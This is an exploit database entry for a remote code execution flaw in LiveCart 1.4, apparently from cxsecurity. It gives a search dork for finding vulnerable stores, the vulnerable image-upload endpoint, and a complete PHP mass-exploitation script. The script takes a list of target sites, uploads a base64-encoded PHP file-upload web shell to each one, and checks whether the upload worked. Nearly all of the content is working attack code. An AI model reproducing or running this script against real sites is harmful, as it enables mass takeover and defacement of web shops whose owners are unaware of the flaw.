LiveCart 1.4 Remote Code Execution

2013.10.24
Credit: DevilScreaM
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264
Dork: intext:Powered by LiveCart

#Title : LiveCart 1.4 Remote Code Execution #Author : DevilScreaM #Date : 10/23/2013 #Category : Web Applications #Type : PHP #Vendor : http://livecart.com #Download : http://livecart.com/download #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Vulnerabillity : Remote Code Execution #Dork : intext:Powered by LiveCart & USE YOUR BRAIN Vuln : http://site-target/library/openFlashChart/ofc_upload_image.php Refference : https://github.com/integry/livecart/blob/master/library/openFlashChart/ofc_upload_image.php Exploit and Script <? @set_time_limit(0); $site = explode("\r\n", $_POST['target']); $filename = $_POST['name']; $path = array('/library/openFlashChart/ofc_upload_image.php'); $result = array("/library/tmp-upload-images/"); $shell = base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgSW5kb25lc2lhbiBEZWZhY2VyIHwgaW5hLnBocDwvdGl0bGU+JzsNCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgQmVyaGFzaWwgISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgR2FnYWwgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4="); $options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $shell)); $context = stream_context_create($options); if($_POST['hajar']) { foreach($site as $target) { foreach($path as $upload) { $fopen = @fopen("{$target}{$upload}?name={$filename}", 'r', false, $context); } foreach($result as $results) { $url = "{$target}{$results}{$filename}"; $check = @file_get_contents($url); if(eregi("0day-id.php.php", $check)) { echo "<font face='Tahoma' size='2'>[+] Sh3ll Uploaded => {$target}/{$results}/{$filename} <br />"; flush(); } } } } ?> <title>0day-id.com | LiveCart Remote Code Execution</title> <form method='POST'> <input type='text' name='name' value='0day-id.php'> <input type='submit' value='Exploit' name='Exploit'><br> <textarea name='target' cols='60' rows='20'></textarea> </form>

References:

https://github.com/integry/livecart/blob/master/library/openFlashChart/ofc_upload_image.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top